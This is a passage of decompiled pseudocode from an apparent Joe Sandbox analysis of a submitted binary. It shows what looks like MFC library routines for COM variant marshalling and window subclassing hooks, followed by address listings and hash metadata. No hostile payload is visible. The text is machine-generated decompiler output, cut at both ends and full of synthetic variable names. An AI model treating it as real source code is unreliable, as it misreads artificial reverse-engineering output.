                                                      				signed short _t240;
                                                      				signed int _t241;
                                                      				signed int _t242;
                                                      				signed int _t250;
                                                      				signed int* _t257;
                                                      				signed int _t258;
                                                      				signed int _t277;
                                                      				signed short* _t278;
                                                      				signed short* _t279;
                                                      				signed int _t290;
                                                      				intOrPtr* _t293;
                                                      				CHAR* _t295;
                                                      				intOrPtr* _t296;
                                                      				intOrPtr _t297;
                                                      				signed int** _t299;
                                                      				void* _t300;
                                                      				void* _t301;
                                                      				void* _t302;
                                                      				void* _t313;
                                                      
                                                      				_push(0x7c);
                                                      				_t190 = E0041F6EA(E0043377E, __ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
                                                      				_t257 = 0;
                                                      				if( *((intOrPtr*)(__ecx)) == 0) {
                                                      					L78:
                                                      					return E0041F7C2(_t190);
                                                      				}
                                                      				 *((intOrPtr*)(_t300 - 0x54)) = 0;
                                                      				 *((intOrPtr*)(_t300 - 0x50)) = 0;
                                                      				 *(_t300 - 0x4c) = 0;
                                                      				 *((intOrPtr*)(_t300 - 0x48)) = 0;
                                                      				 *(_t300 - 4) = 0;
                                                      				E0041F330(__edi, _t300 - 0x54, 0, 0x10);
                                                      				_t302 = _t301 + 0xc;
                                                      				if( *(_t300 + 0x18) != 0) {
                                                      					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
                                                      				}
                                                      				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
                                                      				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
                                                      					 *((intOrPtr*)(_t300 - 0x48)) = 1;
                                                      					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
                                                      				}
                                                      				 *((intOrPtr*)(_t300 - 0x68)) = 0x437058;
                                                      				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
                                                      				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
                                                      				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
                                                      				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
                                                      				_t194 =  *(_t300 - 0x4c);
                                                      				_t308 =  *(_t300 - 0x4c) - _t257;
                                                      				 *(_t300 - 4) = 1;
                                                      				_t293 = 4;
                                                      				if( *(_t300 - 0x4c) == _t257) {
                                                      					L37:
                                                      					_t295 = 0;
                                                      					E0041A7E4(_t300 - 0x44);
                                                      					if( *(_t300 + 0x10) != _t257) {
                                                      						_t295 = _t300 - 0x44;
                                                      					}
                                                      					E0041F330(_t293, _t300 - 0x88, _t257, 0x20);
                                                      					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
                                                      					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
                                                      					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x439340, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
                                                      					E0041C700(_t300 - 0x68);
                                                      					_t203 =  *(_t300 - 0x4c);
                                                      					if(_t203 == _t257) {
                                                      						L46:
                                                      						_push( *((intOrPtr*)(_t300 - 0x54)));
                                                      						E00402F0C(_t257, _t293, _t295, _t319);
                                                      						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
                                                      						if( *(_t300 + 0xc) >= _t257) {
                                                      							L61:
                                                      							_t295 =  *(_t300 + 0x10);
                                                      							if(_t295 == _t257) {
                                                      								L76:
                                                      								 *(_t300 - 4) = 0;
                                                      								_t190 = E0041B9F7(_t300 - 0x68);
                                                      								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
                                                      								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
                                                      								if(__eflags != 0) {
                                                      									_push( *((intOrPtr*)(_t300 - 0x54)));
                                                      									_t190 = E00402F0C(_t257, _t293, _t295, __eflags);
                                                      								}
                                                      								goto L78;
                                                      							}
                                                      							if(_t295 == 0xc) {
                                                      								L65:
                                                      								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
                                                      								__eflags = _t206 - 0x13;
                                                      								if(_t206 > 0x13) {
                                                      									goto L76;
                                                      								}
                                                      								switch( *((intOrPtr*)(_t206 * 4 +  &M0041CCE7))) {
                                                      									case 0:
                                                      										__eax =  *(__ebp + 0x14);
                                                      										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                      										goto L76;
                                                      									case 1:
                                                      										__eax =  *(__ebp + 0x14);
                                                      										__ecx =  *(__ebp - 0x3c);
                                                      										 *( *(__ebp + 0x14)) = __ecx;
                                                      										goto L76;
                                                      									case 2:
                                                      										__eax =  *(__ebp + 0x14);
                                                      										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                      										goto L76;
                                                      									case 3:
                                                      										__eax =  *(__ebp + 0x14);
                                                      										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                      										goto L76;
                                                      									case 4:
                                                      										__ecx =  *(__ebp - 0x3c);
                                                      										__eax =  *(__ebp + 0x14);
                                                      										 *__eax =  *(__ebp - 0x3c);
                                                      										__ecx =  *(__ebp - 0x38);
                                                      										 *(__eax + 4) = __ecx;
                                                      										goto L76;
                                                      									case 5:
                                                      										__eax = E0040ECBE(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
                                                      										_push( *(__ebp - 0x3c));
                                                      										__imp__#6();
                                                      										goto L76;
                                                      									case 6:
                                                      										__ecx =  *(__ebp + 0x14);
                                                      										__eax = 0;
                                                      										__eflags =  *(__ebp - 0x3c) - __bx;
                                                      										__eax = 0 | __eflags != 0x00000000;
                                                      										 *__ecx = __eflags != 0;
                                                      										goto L76;
                                                      									case 7:
                                                      										__edi =  *(__ebp + 0x14);
                                                      										__esi = __ebp - 0x44;
                                                      										asm("movsd");
                                                      										asm("movsd");
                                                      										asm("movsd");
                                                      										asm("movsd");
                                                      										__ebx = 0;
                                                      										goto L76;
                                                      									case 8:
                                                      										goto L76;
                                                      									case 9:
                                                      										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
                                                      										goto L76;
                                                      								}
                                                      							}
                                                      							_t208 = _t300 - 0x44;
                                                      							__imp__#12(_t208, _t208, _t257, _t295);
                                                      							_t293 = _t208;
                                                      							_t321 = _t293 - _t257;
                                                      							if(_t293 >= _t257) {
                                                      								goto L65;
                                                      							}
                                                      							__imp__#9(_t300 - 0x44);
                                                      							_push(_t293);
                                                      							L49:
                                                      							E00403115(_t257, _t293, _t295, _t321);
                                                      							L50:
                                                      							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
                                                      							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
                                                      								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
                                                      							}
                                                      							_t211 = E00402EE1(_t322, 0x20);
                                                      							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
                                                      							_t323 = _t211 - _t257;
                                                      							 *(_t300 - 4) = 4;
                                                      							if(_t211 != _t257) {
                                                      								_push( *((intOrPtr*)(_t300 - 0x88)));
                                                      								_push(_t257);
                                                      								_push(_t257);
                                                      								_t257 = E0041C157(_t257, _t211, _t293, _t295, _t323);
                                                      							}
                                                      							_push( *((intOrPtr*)(_t300 - 0x84)));
                                                      							_t293 = __imp__#7;
                                                      							 *(_t300 - 4) = 1;
                                                      							if( *_t293() != 0) {
                                                      								_t139 = _t257 + 0x18; // 0x18
                                                      								E0040342E(_t139,  *((intOrPtr*)(_t300 - 0x84)));
                                                      							}
                                                      							_t296 = __imp__#6;
                                                      							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
                                                      							_push( *((intOrPtr*)(_t300 - 0x80)));
                                                      							if( *_t293() != 0) {
                                                      								_t143 = _t257 + 0xc; // 0xc
                                                      								E0040342E(_t143,  *((intOrPtr*)(_t300 - 0x80)));
                                                      							}
                                                      							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
                                                      							_push( *((intOrPtr*)(_t300 - 0x7c)));
                                                      							if( *_t293() != 0) {
                                                      								_t147 = _t257 + 0x14; // 0x14
                                                      								E0040342E(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
                                                      							}
                                                      							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
                                                      							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
                                                      							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
                                                      							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
                                                      							E0041F7F4(_t300 + 0x14, 0x43ef68);
                                                      							goto L61;
                                                      						}
                                                      						__imp__#9(_t300 - 0x44);
                                                      						_t321 =  *(_t300 + 0xc) - 0x80020009;
                                                      						if( *(_t300 + 0xc) == 0x80020009) {
                                                      							goto L50;
                                                      						}
                                                      						_push( *(_t300 + 0xc));
                                                      						goto L49;
                                                      					} else {
                                                      						_t295 =  *(_t300 + 0x18);
                                                      						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
                                                      						while(1) {
                                                      							_t319 =  *_t295;
                                                      							if( *_t295 == 0) {
                                                      								goto L46;
                                                      							}
                                                      							_t230 =  *_t295;
                                                      							__eflags = _t230 - 8;
                                                      							if(_t230 == 8) {
                                                      								L43:
                                                      								__imp__#9(_t293);
                                                      								L44:
                                                      								_t293 = _t293 - 0x10;
                                                      								_t295 =  &(_t295[1]);
                                                      								__eflags = _t295;
                                                      								continue;
                                                      							}
                                                      							__eflags = _t230 - 0xe;
                                                      							if(_t230 != 0xe) {
                                                      								goto L44;
                                                      							}
                                                      							goto L43;
                                                      						}
                                                      						goto L46;
                                                      					}
                                                      				} else {
                                                      					_t290 = 0x10;
                                                      					_t297 = E00402EE1(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
                                                      					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
                                                      					E0041F330(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
                                                      					_t236 =  *(_t300 + 0x18);
                                                      					_t277 =  *(_t300 - 0x4c) << 4;
                                                      					_t302 = _t302 + 0x10;
                                                      					_t36 = _t277 - 0x10; // -16
                                                      					_t278 = _t297 + _t36;
                                                      					 *(_t300 - 0x14) = _t236;
                                                      					 *(_t300 - 0x10) = _t278;
                                                      					if( *_t236 == 0) {
                                                      						goto L37;
                                                      					}
                                                      					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
                                                      					_t299 =  &(_t278[4]);
                                                      					_t258 = _t237 - 4;
                                                      					 *(_t300 - 0x1c) = _t299;
                                                      					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
                                                      					do {
                                                      						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
                                                      						_t279 =  *(_t300 - 0x10);
                                                      						 *_t279 = _t240;
                                                      						if((_t240 & 0x00000040) != 0) {
                                                      							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
                                                      						}
                                                      						_t241 =  *_t279 & 0x0000ffff;
                                                      						_t313 = _t241 - 0x4002;
                                                      						if(_t313 > 0) {
                                                      							_t242 = _t241 - 0x4003;
                                                      							__eflags = _t242 - 0x12;
                                                      							if(__eflags > 0) {
                                                      								goto L35;
                                                      							}
                                                      							switch( *((intOrPtr*)(_t242 * 4 +  &M0041CC9B))) {
                                                      								case 0:
                                                      									goto L34;
                                                      								case 1:
                                                      									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                      									_t258 = _t258 + _t293;
                                                      									_t244 =  *_t258;
                                                      									asm("sbb ecx, ecx");
                                                      									 *_t244 =  ~( *_t244) & 0x0000ffff;
                                                      									 *_t299 = _t244;
                                                      									_t245 = E0041B66F(_t300 - 0x34, _t244, _t244, 0);
                                                      									 *(_t300 - 4) = 3;
                                                      									E0041BA91(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
                                                      									__eflags =  *(_t300 - 0x2c);
                                                      									 *(_t300 - 4) = 1;
                                                      									if(__eflags != 0) {
                                                      										_push( *((intOrPtr*)(_t300 - 0x34)));
                                                      										E00402F0C(_t258, _t293, _t299, __eflags);
                                                      									}
                                                      									goto L35;
                                                      								case 2:
                                                      									goto L35;
                                                      							}
                                                      						} else {
                                                      							if(_t313 == 0) {
                                                      								L34:
                                                      								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                      								_t258 = _t258 + _t293;
                                                      								__eflags = _t258;
                                                      								 *_t299 =  *_t258;
                                                      								goto L35;
                                                      							}
                                                      							_t250 = _t241;
                                                      							if(_t250 > 0x13) {
                                                      								goto L35;
                                                      							}
                                                      							switch( *((intOrPtr*)(_t250 * 4 +  &M0041CC4B))) {
                                                      								case 0:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                      									__ebx = __ebx + __edi;
                                                      									__ax =  *__ebx;
                                                      									goto L28;
                                                      								case 1:
                                                      									goto L34;
                                                      								case 2:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                      									__eax =  *(__ebp + 0x1c);
                                                      									__ebx =  &(__ebx[2]);
                                                      									 *__esi =  *( *(__ebp + 0x1c));
                                                      									goto L35;
                                                      								case 3:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                      									__eax =  *(__ebp + 0x1c);
                                                      									__ebx =  &(__ebx[2]);
                                                      									 *__esi =  *( *(__ebp + 0x1c));
                                                      									goto L35;
                                                      								case 4:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                      									__ebx = __ebx + __edi;
                                                      									__eax =  *__ebx;
                                                      									goto L17;
                                                      								case 5:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                      									__ebx = __ebx + __edi;
                                                      									__eax =  *__ebx;
                                                      									_push(__eax);
                                                      									 *(__ebp - 0x1c) = __eax;
                                                      									__imp__#2();
                                                      									__eflags =  *(__ebp - 0x1c);
                                                      									 *__esi = __eax;
                                                      									if(__eflags == 0) {
                                                      										goto L35;
                                                      									}
                                                      									__eflags = __eax;
                                                      									if(__eflags != 0) {
                                                      										goto L35;
                                                      									}
                                                      									goto L23;
                                                      								case 6:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                      									__ebx = __ebx + __edi;
                                                      									 *__ebx =  ~( *__ebx);
                                                      									asm("sbb eax, eax");
                                                      									L28:
                                                      									 *__esi = __ax;
                                                      									goto L35;
                                                      								case 7:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                      									__edi =  *(__ebp - 0x10);
                                                      									__ebx =  &(__ebx[1]);
                                                      									__esi =  *__ebx;
                                                      									asm("movsd");
                                                      									asm("movsd");
                                                      									asm("movsd");
                                                      									asm("movsd");
                                                      									__esi =  *(__ebp - 0x1c);
                                                      									_push(4);
                                                      									_pop(__edi);
                                                      									goto L35;
                                                      								case 8:
                                                      									L24:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                      									__ebx = __ebx + __edi;
                                                      									__eax =  *__ebx;
                                                      									_push(__eax);
                                                      									__ecx = __ebp - 0x18;
                                                      									 *(__ebp - 0x1c) = __eax;
                                                      									__eax = E004036AB(__ebx, __ecx, __edi, __esi, __eflags);
                                                      									_push( *(__ebp - 0x18));
                                                      									 *((char*)(__ebp - 4)) = 2;
                                                      									__imp__#2();
                                                      									__eflags =  *(__ebp - 0x1c);
                                                      									 *__esi = __eax;
                                                      									if( *(__ebp - 0x1c) == 0) {
                                                      										L26:
                                                      										__ecx =  *(__ebp - 0x18);
                                                      										__eax =  *(__ebp - 0x10);
                                                      										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
                                                      										 *( *(__ebp - 0x10)) = 8;
                                                      										 *((char*)(__ebp - 4)) = 1;
                                                      										__eax = E00403036(__ecx, __edx);
                                                      										goto L35;
                                                      									}
                                                      									__eflags = __eax;
                                                      									if(__eflags == 0) {
                                                      										L23:
                                                      										__eax = E004037AF(__ebx, __ecx, __edi, __esi, __eflags);
                                                      										goto L24;
                                                      									}
                                                      									goto L26;
                                                      								case 9:
                                                      									goto L35;
                                                      								case 0xa:
                                                      									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                      									_t258 = _t258 + _t293;
                                                      									 *_t299 =  *_t258;
                                                      									goto L35;
                                                      								case 0xb:
                                                      									__eax =  *(__ebp + 0x1c);
                                                      									__eax =  *(__ebp + 0x1c) + 8;
                                                      									 *(__ebp + 0x1c) = __eax;
                                                      									__ebx =  &(__ebx[2]);
                                                      									__eflags = __ebx;
                                                      									L17:
                                                      									__ecx =  *__eax;
                                                      									 *__esi = __ecx;
                                                      									 *(__esi + 4) = __eax;
                                                      									goto L35;
                                                      							}
                                                      						}
                                                      						L35:
                                                      						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
                                                      						_t299 = _t299 - 0x10;
                                                      						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
                                                      						 *(_t300 - 0x1c) = _t299;
                                                      					} while ( *( *(_t300 - 0x14)) != 0);
                                                      					_t257 = 0;
                                                      					goto L37;
                                                      				}
                                                      			}































                                                      0x0041ca75
                                                      0x0041ca7b
                                                      0x0041ca7b
                                                      0x0041ca7e
                                                      0x0041ca7e
                                                      0x00000000
                                                      0x0041ca7e
                                                      0x0041ca70
                                                      0x0041ca72
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041ca72
                                                      0x00000000
                                                      0x0041ca7f
                                                      0x0041c7de
                                                      0x0041c7e2
                                                      0x0041c7f2
                                                      0x0041c7fd
                                                      0x0041c800
                                                      0x0041c808
                                                      0x0041c80b
                                                      0x0041c80e
                                                      0x0041c814
                                                      0x0041c814
                                                      0x0041c818
                                                      0x0041c81b
                                                      0x0041c81e
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c824
                                                      0x0041c829
                                                      0x0041c82c
                                                      0x0041c832
                                                      0x0041c835
                                                      0x0041c838
                                                      0x0041c83b
                                                      0x0041c841
                                                      0x0041c844
                                                      0x0041c847
                                                      0x0041c851
                                                      0x0041c851
                                                      0x0041c854
                                                      0x0041c85c
                                                      0x0041c85e
                                                      0x0041c97b
                                                      0x0041c980
                                                      0x0041c983
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c985
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c98c
                                                      0x0041c98f
                                                      0x0041c991
                                                      0x0041c997
                                                      0x0041c9a1
                                                      0x0041c9a8
                                                      0x0041c9aa
                                                      0x0041c9b6
                                                      0x0041c9ba
                                                      0x0041c9bf
                                                      0x0041c9c3
                                                      0x0041c9c7
                                                      0x0041c9c9
                                                      0x0041c9cc
                                                      0x0041c9d1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c864
                                                      0x0041c864
                                                      0x0041c9d4
                                                      0x0041c9d4
                                                      0x0041c9d7
                                                      0x0041c9d7
                                                      0x0041c9db
                                                      0x00000000
                                                      0x0041c9db
                                                      0x0041c86b
                                                      0x0041c86f
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c875
                                                      0x00000000
                                                      0x0041c88a
                                                      0x0041c88d
                                                      0x0041c88f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c8b2
                                                      0x0041c8b6
                                                      0x0041c8bb
                                                      0x0041c8be
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c8c5
                                                      0x0041c8c9
                                                      0x0041c8ce
                                                      0x0041c8d1
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c8d8
                                                      0x0041c8db
                                                      0x0041c8dd
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c8e1
                                                      0x0041c8e4
                                                      0x0041c8e6
                                                      0x0041c8e8
                                                      0x0041c8e9
                                                      0x0041c8ec
                                                      0x0041c8f2
                                                      0x0041c8f6
                                                      0x0041c8f8
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c8fe
                                                      0x0041c900
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c953
                                                      0x0041c956
                                                      0x0041c95a
                                                      0x0041c95c
                                                      0x0041c95e
                                                      0x0041c95e
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c963
                                                      0x0041c967
                                                      0x0041c96a
                                                      0x0041c96d
                                                      0x0041c96f
                                                      0x0041c970
                                                      0x0041c971
                                                      0x0041c972
                                                      0x0041c973
                                                      0x0041c976
                                                      0x0041c978
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c90b
                                                      0x0041c90b
                                                      0x0041c90e
                                                      0x0041c910
                                                      0x0041c912
                                                      0x0041c913
                                                      0x0041c916
                                                      0x0041c919
                                                      0x0041c91e
                                                      0x0041c921
                                                      0x0041c925
                                                      0x0041c92b
                                                      0x0041c92f
                                                      0x0041c931
                                                      0x0041c937
                                                      0x0041c937
                                                      0x0041c93a
                                                      0x0041c93d
                                                      0x0041c940
                                                      0x0041c945
                                                      0x0041c949
                                                      0x00000000
                                                      0x0041c949
                                                      0x0041c933
                                                      0x0041c935
                                                      0x0041c906
                                                      0x0041c906
                                                      0x00000000
                                                      0x0041c906
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c87c
                                                      0x0041c87f
                                                      0x0041c883
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c897
                                                      0x0041c89a
                                                      0x0041c89d
                                                      0x0041c8a0
                                                      0x0041c8a0
                                                      0x0041c8a3
                                                      0x0041c8a3
                                                      0x0041c8a5
                                                      0x0041c8aa
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c875
                                                      0x0041c9dd
                                                      0x0041c9dd
                                                      0x0041c9e1
                                                      0x0041c9e4
                                                      0x0041c9ed
                                                      0x0041c9ed
                                                      0x0041c9f6
                                                      0x00000000
                                                      0x0041c9f6

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                      • String ID: XpC
                                                      • API String ID: 4128688680-1560596422
                                                      • Opcode ID: be4c868b454149c2b2600008163556171ca705d1456a4cebcd2cc0c5bfb6c5b4
                                                      • Instruction ID: 96ace918a2bd9a0f0a8ad0f941851b9479455dd266bf0f0d67035f332fcd63c4
                                                      • Opcode Fuzzy Hash: be4c868b454149c2b2600008163556171ca705d1456a4cebcd2cc0c5bfb6c5b4
                                                      • Instruction Fuzzy Hash: 93F19AB1940209DFDF10DFA8CC84AEEBBB5EF05304F14406AE815AB291D7789E92CF59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E0040B4F5(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr _t54;
                                                      				void* _t55;
                                                      				signed int _t56;
                                                      				void* _t59;
                                                      				long _t60;
                                                      				signed int _t64;
                                                      				void* _t66;
                                                      				short _t72;
                                                      				signed int _t74;
                                                      				signed int _t76;
                                                      				long _t83;
                                                      				signed int _t86;
                                                      				signed short _t87;
                                                      				signed int _t88;
                                                      				int _t94;
                                                      				void* _t106;
                                                      				long* _t108;
                                                      				long _t110;
                                                      				signed int _t111;
                                                      				CHAR* _t112;
                                                      				intOrPtr _t113;
                                                      				void* _t116;
                                                      				void* _t119;
                                                      				intOrPtr _t120;
                                                      
                                                      				_t119 = __eflags;
                                                      				_t105 = __edi;
                                                      				_push(0x148);
                                                      				E0041F753(E00432474, __ebx, __edi, __esi);
                                                      				_t110 =  *(_t116 + 0x10);
                                                      				_t94 =  *(_t116 + 0xc);
                                                      				_push(0x4037fd);
                                                      				 *(_t116 - 0x120) = _t110;
                                                      				_t54 = E0040F584(_t94, 0x44642c, __edi, _t110, _t119);
                                                      				_t120 = _t54;
                                                      				_t97 = 0 | _t120 == 0x00000000;
                                                      				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
                                                      				_t121 = _t120 == 0;
                                                      				if(_t120 == 0) {
                                                      					_t54 = E004037E3(_t94, _t97, __edi, _t110, _t121);
                                                      				}
                                                      				if( *(_t116 + 8) == 3) {
                                                      					_t106 =  *_t110;
                                                      					_t111 =  *(_t54 + 0x14);
                                                      					_t55 = E0040DB94(_t94, _t106, _t111, __eflags);
                                                      					__eflags = _t111;
                                                      					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                      					 *(_t116 - 0x124) = _t56;
                                                      					if(_t111 != 0) {
                                                      						L7:
                                                      						__eflags =  *0x446804;
                                                      						if( *0x446804 == 0) {
                                                      							L12:
                                                      							__eflags = _t111;
                                                      							if(__eflags == 0) {
                                                      								__eflags =  *0x44640c;
                                                      								if( *0x44640c != 0) {
                                                      									L19:
                                                      									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x44640c; // 0x8000
                                                      									if(__eflags != 0) {
                                                      										L23:
                                                      										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                      										__eflags = _t59;
                                                      										 *(_t116 - 0x14) = _t59;
                                                      										if(_t59 != 0) {
                                                      											_t112 = "AfxOldWndProc423";
                                                      											_t64 = GetPropA(_t94, _t112);
                                                      											__eflags = _t64;
                                                      											if(_t64 == 0) {
                                                      												SetPropA(_t94, _t112,  *(_t116 - 0x14));
                                                      												_t66 = GetPropA(_t94, _t112);
                                                      												__eflags = _t66 -  *(_t116 - 0x14);
                                                      												if(_t66 ==  *(_t116 - 0x14)) {
                                                      													GlobalAddAtomA(_t112);
                                                      													SetWindowLongA(_t94, 0xfffffffc, E0040B3B1);
                                                      												}
                                                      											}
                                                      										}
                                                      										L27:
                                                      										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
                                                      										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
                                                      										__eflags =  *(_t116 - 0x124);
                                                      										_t110 = _t60;
                                                      										if( *(_t116 - 0x124) != 0) {
                                                      											UnhookWindowsHookEx( *(_t105 + 0x28));
                                                      											_t50 = _t105 + 0x28;
                                                      											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
                                                      											__eflags =  *_t50;
                                                      										}
                                                      										goto L30;
                                                      									}
                                                      									goto L27;
                                                      								}
                                                      								_t113 = 0x30;
                                                      								E0041F330(_t106, _t116 - 0x154, 0, _t113);
                                                      								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
                                                      								_push(_t116 - 0x154);
                                                      								_push("#32768");
                                                      								_push(0);
                                                      								_t72 = E0040875E(_t94, _t97, _t106, "#32768", __eflags);
                                                      								__eflags = _t72;
                                                      								 *0x44640c = _t72;
                                                      								if(_t72 == 0) {
                                                      									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
                                                      									__eflags = _t74;
                                                      									if(_t74 == 0) {
                                                      										goto L23;
                                                      									}
                                                      									 *((char*)(_t116 - 0x19)) = 0;
                                                      									_t76 = E0042158D(_t116 - 0x118, "#32768");
                                                      									__eflags = _t76;
                                                      									if(_t76 == 0) {
                                                      										goto L27;
                                                      									}
                                                      									goto L23;
                                                      								}
                                                      								goto L19;
                                                      							}
                                                      							E0040DBE0(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
                                                      							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
                                                      							E00409CD8(_t111, _t116, _t94);
                                                      							 *((intOrPtr*)( *_t111 + 0x50))();
                                                      							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
                                                      							_t83 = SetWindowLongA(_t94, 0xfffffffc, E0040A3D5);
                                                      							__eflags = _t83 - E0040A3D5;
                                                      							if(_t83 != E0040A3D5) {
                                                      								 *_t108 = _t83;
                                                      							}
                                                      							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
                                                      							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
                                                      							__eflags =  *(_t116 - 0x14);
                                                      							if( *(_t116 - 0x14) != 0) {
                                                      								_push( *(_t116 - 0x18));
                                                      								_push(0);
                                                      								E0040D3B7();
                                                      							}
                                                      							goto L27;
                                                      						}
                                                      						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                      						__eflags = _t86 & 0x00010000;
                                                      						if((_t86 & 0x00010000) != 0) {
                                                      							goto L27;
                                                      						}
                                                      						_t87 =  *(_t106 + 0x28);
                                                      						__eflags = _t87 - 0xffff;
                                                      						if(_t87 <= 0xffff) {
                                                      							 *(_t116 - 0x18) = 0;
                                                      							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
                                                      							_t87 = _t116 - 0x18;
                                                      						}
